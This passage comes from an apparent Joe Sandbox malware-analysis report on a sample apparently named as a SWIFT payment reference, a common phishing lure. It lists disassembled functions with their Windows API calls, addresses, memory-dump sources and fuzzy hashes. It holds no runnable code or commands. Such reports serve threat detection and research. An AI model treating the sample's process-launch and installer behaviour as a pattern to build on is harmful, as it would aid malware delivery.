                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 49f9fd1bc8bfa64a42858f6b518ea0692b6e5c78bd7a65508ddb9d9f32b2eb8f
                            • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                            • Opcode Fuzzy Hash: 49f9fd1bc8bfa64a42858f6b518ea0692b6e5c78bd7a65508ddb9d9f32b2eb8f
                            • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                            • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                            • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                            • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ShellExecuteExW.SHELL32(?), ref: 00405B3C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: ExecuteShell
                            • String ID:
                            • API String ID: 587946157-0
                            • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                            • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                            • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                            • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                            • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                            • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                            • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                            • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                            • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                            • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                              • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                              • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                              • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                              • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                            • String ID:
                            • API String ID: 2972824698-0
                            • Opcode ID: 0565585741ff3a54c4db3f9c84488b230b3a83c5e1087797c690e03fca88cb62
                            • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                            • Opcode Fuzzy Hash: 0565585741ff3a54c4db3f9c84488b230b3a83c5e1087797c690e03fca88cb62
                            • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                            • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                            • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                            • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                              • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                              • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                              • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                              • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                              • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                            • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                              • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                              • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                              • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne
                            • API String ID: 2624150263-3229615022
                            • Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                            • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                            • Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                            • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                            • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                            • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                            • DeleteObject.GDI32(00000000), ref: 00404FCA
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                            • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                            • ShowWindow.USER32(?,00000005), ref: 0040512C
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                            • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                            • GlobalFree.KERNEL32(?), ref: 0040530A
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                            • ShowWindow.USER32(?,00000000), ref: 004054B4
                            • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                            • ShowWindow.USER32(00000000), ref: 004054C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                            • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                            • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                            • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                            • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                            • GetSysColor.USER32(?), ref: 00404702
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                            • lstrlenW.KERNEL32(?), ref: 00404723
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                            • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                            • SendMessageW.USER32(00000000), ref: 004047A5
                            • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                            • SetCursor.USER32(00000000), ref: 00404824
                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                            • SetCursor.USER32(00000000), ref: 00404840
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: : Completed$N
                            • API String ID: 3103080414-2140067464
                            • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                            • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                            • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                            • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                            • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                            • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                            • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
